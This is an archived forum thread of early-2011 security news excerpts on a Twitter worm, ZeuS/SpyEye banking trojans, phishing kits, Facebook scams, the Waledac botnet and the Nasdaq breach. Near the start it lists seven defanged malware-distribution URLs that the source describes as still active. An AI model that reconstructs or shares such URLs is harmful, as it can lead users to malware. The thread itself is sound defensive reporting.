SPAM frauds, fakes, and other MALWARE deliveries - archive

[AplusWebMaster]

FYI...

Twitter worm - out there...
- http://isc.sans.edu/diary.html?storyid=10297
Last Updated: 2011-01-20 16:41:39 UTC - "... new twitter worm out there. There are an increased number of messages... Those short URL points to the servers providing the malware. The following are some of the malicious URL I could gather (CAREFUL: THEY ARE STILL ACTIVE):
• http ://cainnoventa .it/m28sx.html
• http ://servizialcittadino .it/m28sx.html
• http ://aimos.fr/m28sx .html
• http ://lowcostcoiffure .fr/m28sx.html
• http ://s15248477.onlinehome-server .info/m28sx.html
• http ://www.waseetstore .com/m28sx.html
• http ://www.gemini .ee/m28sx.html
After clicking to the URL, you are sent to a faveAV web page..."
(Screenshots available at the ISC URL above.)
___

- http://www.pcworld.com/article/21730...ware_scam.html
Jan 21, 2011 "... Del Harvey, head of Twitter's Trust and Safety Team, wrote on her Twitter account that 'we're working to remove the malware links and reset passwords on compromised accounts.' 'Did you follow a goo.gl link that led to a page telling you to install 'Security Shield' Rogue AV?' she wrote. 'That's malware. Don't install'..."

- http://nakedsecurity.sophos.com/2011...-goo-gl-links/
January 20, 2011 - "... If you make the mistake of clicking on one of the malicious goo.gl links you are ultimately taken to a website which attempts to scare you into believing that you have a virus problem on your computer. You are then frightened into installing malicious code on your PC, and asked to pay money to disinfect your systems... Ukranian URL hosting the malware... The natural suspicion would be that their usernames and passwords have been stolen. It certainly would be a sensible precaution for users who have found their Twitter accounts unexpectedly posting goo.gl links to change their passwords immediately..."

[AplusWebMaster]

FYI...

Fraud advisory - FBI/iC3: e-mails...
- http://www.ic3.gov/media/2011/110119.aspx
January 19, 2011 - "... cyber criminals engaging in ACH/wire transfer fraud have targeted businesses by responding via e-mail to employment opportunities posted online. Recently, more than $150,000 was stolen from a US business via unauthorized wire transfer as a result of an e-mail the business received that contained malware. The malware was embedded in an e-mail response to a job posting the business placed on an employment website and allowed the attacker to obtain the online banking credentials of the person who was authorized to conduct financial transactions within the company. The malicious actor changed the account settings to allow the sending of wire transfers, one to the Ukraine and two to domestic accounts. The malware was identified as a Bredolab variant, svrwsc.exe. This malware was connected to the ZeuS/Zbot Trojan, which is commonly used by cyber criminals to defraud US businesses. The FBI recommends that potential employers remain vigilant in opening the e-mails of perspective employees. Running a virus scan prior to opening any e-mail attachments may provide an added layer of security against this type of attack. The FBI also recommends that businesses use separate computer systems to conduct financial transactions..."
___

Zbot-Zeus variants attack online money transactions...
- http://www.theregister.co.uk/2011/01...versification/
21 January 2011 - "... Trusteer has detected 26 different ZeuS configurations targeting online payment provider Money Bookers. Configuration files are a set of instructions on what sites to target for the theft of login credentials, manipulation of HTML pages as presented to users of infected machines and other details. Another 13 variants of ZeuS, the last released only on 16 January, attempt to steal login credentials of Web Money users. Nochex, another online payment provider that specialises in providing payment processing services to small businesses, is the target of 12 different ZeuS configurations. Prepaid card provider netSpend and e-gold, a service abused as a payment clearing house by cybercrooks in the past, are also under attack by ZeuS wielding miscreants... More details... here*."
* http://www.trusteer.com/blog/zeus-la...ment-providers
January 20, 2011

[AplusWebMaster]

FYI...

SpyEye/ZeuS toolkit code shows up ...
- http://www.theregister.co.uk/2011/01...e_zeus_merger/
25 January 2011 - "... first sample of code from the merger of the ZeuS and SpyEye cybercrime Trojan toolkits*... ZeuS has long been the root cause of many instances of banking fraud, while SpyEye is a much newer and even more aggressive addition... The malware-building tool includes options to build-in web injects, screenshot captures as well as hooks for various optional add-ins. Core functionality also includes code designed to evade Trusteer Rapport transactions security software, a security application offered to customers of many banks as a defence against banking Trojans. The latter feature shows that, once again, cybercrooks are attempting to up their game in response to developments by security defenders. Plug-ins include the ability to present users of compromised machines with fake pages and improved attacks against Firefox users... The cybercrime toolkit also includes improved credit-card grabbing functionality... Misdirection and misinformation... among the main tools of the cybercrime trade."
* http://blog.trendmicro.com/spyeyezeu...-v1-3-05-beta/
Toolkit detail ...

[AplusWebMaster]

FYI...

One-Kit-Phishes-All
- http://community.websense.com/blogs/...phish-kit.aspx
25 Jan 2011 - "... The attack first imitates the Australian Tax Office (ATO) e-tax refund page, an online system where taxpayers can lodge their annual tax refund requests. The kit readies 7 of the biggest banks of Australia, covering almost all accounts. This kit was hosted on compromised Web sites with deep directories specifically mimicking the ATO Web site. Each bank phishing Web site was then placed... Similar to earlier phishing toolkits, this attack utilizes PHP scripts to retrieve, parse, and send on the compromised account information. The kit was also held on several other compromised Web sites to enable the failover of the attack - given the limited lifecycle of phishing sites, more users fall victim to them in the first 24 hours of the attack. The readiness of this phishing toolkit -exceeds- Rock Phish..."


___

Facebook Tunisia keystroke logger...
- http://www.theregister.co.uk/2011/01...word_slurping/
25 January 2011 - "Malicious code injected into Tunisian versions of Facebook, Gmail, and Yahoo! stole login credentials of users critical of the North African nation's authoritarian government... The rogue JavaScript, which was individually customized to steal passwords for each site, worked when users tried to login without availing themselves of the secure sockets layer protection designed to prevent man-in-the-middle attacks. It was found injected into Tunisian versions of Facebook, Gmail, and Yahoo! in late December, around the same time that protestors began demanding the ouster of Zine el-Abidine Ben Ali, the president who ruled the country from 1987 until his ouster 10 days ago..."
___

Facebook photos lead to malware...
- http://sunbeltblog.blogspot.com/2011...o-malware.html
January 25, 2011 - "This latest Facebook scam seems to have been rattling around for a few weeks now, directing you to malware from hacked websites hosting the rogue files. There also appear to be various Facebook application pages offering up the same dubious content. Typically, the scam involves sending messages to Facebook users from compromised accounts... Not a lot of sophistication there, but it doesn’t really take much to get people clicking. Downloading the file and running it will result in you sending your friends more "Foto" related spam and the whole process begins again. Some users report the messages appearing on their walls, while others have screenshots of messages popping up in their chat applications..."
___

Facebook scam: Free cellphone recharge
- http://sunbeltblog.blogspot.com/2011...-recharge.html
January 24, 2011

[AplusWebMaster]

FYI...

Carberp malware sniffs out A/V to maximize attack impact
- http://www.computerworld.com/s/artic..._attack_impact
January 24, 2011 - "... The authors of the new information-stealing trojan "Carberp" have added a feature that detects which antivirus program is running on victimized PCs, said Aviv Raff, the chief technology officer at Seculert, an Israeli security startup. Raff said the criminals added security software detection to make sure they're spending their money wisely... The test services Raff mentioned are similar to legitimate scanning services such as VirusTotal, which lets users upload suspicious files for scanning by scores of for-a-fee and free antivirus programs. Suspect samples that evade detection are shared with the anti-malware community for use in creating new signatures. But other, less scrupulous services have popped up to serve criminals. These services, which security blogger Brian Krebs reported on as early as December 2009*, do not alert security companies when a new piece of malware is detected. That makes them ideal for hackers to check whether code will be detected before they release it. Raff said hackers pay to run their malware through these gray-market services to check the detection status of their code before they release it... Raff expects that Carberp will follow in the footsteps of the SpyEye and Siberia attack kits, and like them, incorporate links to a scanning service. Last week, Raff published an analysis of Carberp** that described new features other than the antivirus polling, including encryption of all communication with the hacker command-and-control server..."
* http://krebsonsecurity.com/2009/12/v...virus-authors/

** http://blog.seculert.com/2011/01/new...evolution.html

[AplusWebMaster]

FYI...

Facebook - NEW security: Secure Browsing (https)
- http://techblog.avira.com/2011/01/27...s-security/en/
"Facebook starts to roll out a new security feature: Secure Browsing (https). It will be available in the options of “Account Security”, below the “Account Settings” page.
This means that all data sent from and to Facebook will be transferred encrypted over the Internet if possible. Attacks to steal identities (for example in WiFi networks with Firesheep) will be rendered impossible this way...
Currently the feature seems to struggle with some problems though... some online games in Facebook don’t work properly together with activated Secure Browsing. This should be solved very soon... this is a step in the right direction and every Facebook user should activate that option as soon as it is available..."
(See screenshots available at the URL above.)

- http://news.cnet.com/8301-27080_3-20029670-245.html
January 26, 2011

- http://www.theregister.co.uk/2011/01/26/facebook_https/
26 January 2011 - "... The move comes a day after pranksters hacked into the Facebook page of CEO Mark Zuckerberg..."

- http://community.websense.com/blogs/...-comments.aspx
26 Jan 2011

[AplusWebMaster]

FYI...

The Tax Spam Cometh
- http://www.pcworld.com/businesscente...am_cometh.html
Jan 28, 2011 - "It is that time of the year again: time to wait anxiously for W2s and 1099s to arrive, then feverishly compile figures and look for deductions to try and get back as much of your money from the IRS - or Her Majesty's Revenue and Customs (HMRC) - as possible. Do you know what that means? That means it is also time for attackers to capitalize on tax season with malware and phishing scams... Phishing e-mails are circulating, claiming that a miscalculation has been detected and that the recipient is owed a larger refund. Fred Touchette of Appriver* explains the new tax season threat. "The scammers see this as an opportunity to possibly catch some people slipping even though this most recent scam is targeting people who are already expecting a refund. To obtain the increased refund, recipients are directed to open the e-mail file attachment titled "Tax.Refund.New.Message.Alert .HTML." The resulting Web page appears to be the actual HMRC site, but is actually generated locally. The form requests sensitive information such as credit card details and mother's maiden name in order to process the refund..."
* http://blogs.appriver.com/blog/digit...am-trend-lines

[AplusWebMaster]

FYI...

Waledac... [has stolen] almost 500,000 email passwords ...
- http://www.theregister.co.uk/2011/02...nt_compromise/
2 February 2011 - "Researchers* have taken a peek inside the recently refurbished Waledac botnet, and what they've found isn't pretty. Waledac, a successor to the once-formidable Storm botnet, has passwords for almost 500,000 Pop3 email accounts, allowing spam to be sent through SMTP servers, according to findings published on Tuesday by security firm Last Line*. By hijacking legitimate email servers, the Waledac gang is able to evade IP-based blacklisting techniques that many spam filters use to weed out junk messages. What's more, Waledac controllers are in possession of almost 124,000 FTP credentials. The passwords let them run programs that automatically infect the websites with scripts that -redirect- users to sites that install malware and promote fake pharmaceuticals. Last month, the researchers identified almost 9,500 webpages from 222 sites that carried poisoned links injected by Waledac. The discovery comes a month after a new malware-seeded spam run was spotted. This had all the hallmarks of the storm botnet... “The Waledac botnet remains just a shadow of its former self for now, but that's likely to change given the number of compromised accounts that the Waledac crew possesses,” the Last Line researchers wrote. In addition to a generous helping of compromised credentials, Waledac also comes with a new command and control system that disseminates a list of router nodes to infected machines."
* http://blog.tllod.com/2011/02/01/calm-before-the-storm/
February 1, 2011
- http://www.shadowserver.org/wiki/pmw...endar/20101230

- http://www.informationweek.com/share...leID=229200280
Feb. 2, 2011

Time for password changes...
- https://www.microsoft.com/protect/fr...s/checker.aspx

[AplusWebMaster]

FYI...

Exploit rate - 61 percent of new vulnerabilities...
- http://www.darkreading.com/taxonomy/...e/id/229201156
Feb 03, 2011 - "The number of exploited vulnerabilities jumped dramatically last month, with more than 60 percent of new vulnerabilities being exploited... Exploit activity is typically at a rate of 30 to 40 percent, according to Fortinet's newly released January 2001 Threat Landscape report*. Close to half of "critical" vulnerabilities were exploited by attackers..."
* http://blog.fortinet.com/january-201...s-another-hit/

[AplusWebMaster]

FYI...

Nasdaq hacked ...
- http://online.wsj.com/article/SB1000...ries#printMode
Feb. 5, 2011 - "Nasdaq acknowledged Saturday it has been the victim of hackers and said it has notified customers about the problem. The statement by Nasdaq OMX Inc. came on the heels of a report in Saturday's Wall Street Journal that said unidentified hackers had repeatedly breached the company's computer network in the past year. In a written statement, the company said during its normal security screening, it discovered "malware" files installed on a part of its network called Directors Desk, a service designed to allow company boards to communicate by securely storing and sharing documents..."

- http://online.wsj.com/article/SB1000...html#printMode
Feb. 5, 2011